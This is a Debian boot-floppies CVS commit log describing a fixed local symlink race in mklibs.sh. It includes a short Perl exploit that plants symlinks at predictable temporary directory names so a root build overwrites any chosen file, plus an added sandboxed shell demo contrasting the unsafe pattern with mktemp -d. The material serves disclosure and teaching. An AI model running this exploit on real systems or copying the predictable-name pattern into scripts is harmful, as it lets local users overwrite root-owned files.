
Debian Boot CVS: joeyh



CVSROOT:	/cvs/debian-boot
Module name:	boot-floppies
Changes by:	joeyh	01/01/11 12:32:45

Modified files:
	scripts/rootdisk: mklibs.sh 

Log message:
Sigh. Fixed a local symlink attack that allowed any user on the system to
overwrite any file on the system with a list of the symbols in libc when
the boot-floppies were building (which typically runs as root..). Working
exploit:

#!/usr/bin/perl
$target=shift;
system `rm -rf /tmp/nasty`;
mkdir '/tmp/nasty', 0755;
chdir '/tmp/nasty';
symlink($target,'undefined-symbols');
chdir '..';
$|=1;
# FIXME: pid wraparound. Plus this could be smarter.
for ($x=$$ + 1; $x < $$ + 100000; $x++) {
symlink("nasty", ",mklibs.$x");
print ".";
}

set -e should *not* be optional in shell scripts!
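
The failure mode behind this fix, as an added example that is not part of the commit or of mklibs.sh: a predictable work directory whose failed mkdir goes unnoticed, next to a mktemp -d replacement. The vulnerable pattern (a work directory named ,mklibs.$$ and an ignored mkdir error) is an assumption inferred from the exploit and the set -e remark above; the function names, the sandbox layout and the file contents are constructed for the demo, which runs entirely inside a throwaway directory.

```shell
#!/bin/sh
# Added example, not the project's mklibs.sh. All paths live in a sandbox.
set -eu

# Assumed vulnerable pattern: predictable name, mkdir failure ignored.
unsafe_workdir() {
    dir="$1/,mklibs.$$"
    # "|| true" stands in for a script running without set -e:
    # "File exists" is not fatal, so a pre-planted symlink gets used.
    mkdir "$dir" 2>/dev/null || true
    printf '%s\n' "$dir"
}

# Hardened: mktemp -d picks an unpredictable name, creates the directory
# atomically with mode 0700, and fails (aborting under set -e) otherwise.
safe_workdir() {
    mktemp -d "$1/mklibs.XXXXXXXXXX"
}

# Sandbox in which the predictable name already exists as a symlink to a
# directory whose undefined-symbols entry points at a "victim" file.
make_sandbox() {
    sb=$(mktemp -d "${TMPDIR:-/tmp}/symlink-demo.XXXXXXXXXX")
    mkdir "$sb/tmp" "$sb/tmp/planted"
    printf 'original\n' > "$sb/victim"
    ln -s "$sb/victim" "$sb/tmp/planted/undefined-symbols"
    ln -s planted "$sb/tmp/,mklibs.$$"
    printf '%s\n' "$sb"
}

# Run one variant in a fresh sandbox and print the victim's final content.
run_variant() {
    sb=$(make_sandbox)
    work=$("$1" "$sb/tmp")
    printf 'symbol list\n' > "$work/undefined-symbols"
    cat "$sb/victim"
    rm -rf "$sb"
}

echo "unsafe: victim now contains: $(run_variant unsafe_workdir)"
echo "safe:   victim now contains: $(run_variant safe_workdir)"
```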


